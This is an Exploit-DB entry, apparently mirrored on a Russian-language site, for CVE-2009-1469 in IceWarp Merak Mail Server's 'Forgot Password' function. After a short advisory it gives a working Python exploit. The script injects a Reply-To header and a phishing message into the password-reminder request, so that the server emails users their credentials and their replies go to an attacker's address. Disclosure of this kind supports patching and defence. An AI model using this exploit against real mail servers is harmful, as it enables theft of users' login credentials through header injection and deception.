- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32986
- Проверка EDB
-
- Пройдено
- Автор
- REDTEAM PENTESTING GMBH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1469
- Дата публикации
- 2009-05-05
Код:
source: https://www.securityfocus.com/bid/34827/info
IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function.
Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible.
#! /usr/bin/env python
import urllib2, sys
conf = {
"captcha_uid": "5989688782215156001239966846169",
"captcha": "4SJZ Z4GY",
"forgot": "[email protected]",
"replyto": "[email protected]",
"server": "http://www.example.com/webmail/server/webmail.php"
}
data = """
<iq type="set">
<query xmlns="webmail:iq:auth">
<forgot>%(forgot)s</forgot>
<captcha uid="%(captcha_uid)s">%(captcha)s</captcha>
<subject>
<![CDATA[
Account expiration %EMAIL%\r\nReply-To: %(replyto)s\n
]]>
</subject>
<message>
Dear %FULLNAME%,
your account
Username: %USERNAME%
Password: %PASSWORD%
has expired. To renew the account, please reply to this email
leaving the email body intact, so we know the account is still
used.
Kind regards,
the IT department
</message>
</query>
</iq>
""" % conf
req = urllib2.Request(conf['server'])
req.add_data(data)
res = urllib2.urlopen(req)
print repr(res.read())- Источник
- www.exploit-db.com
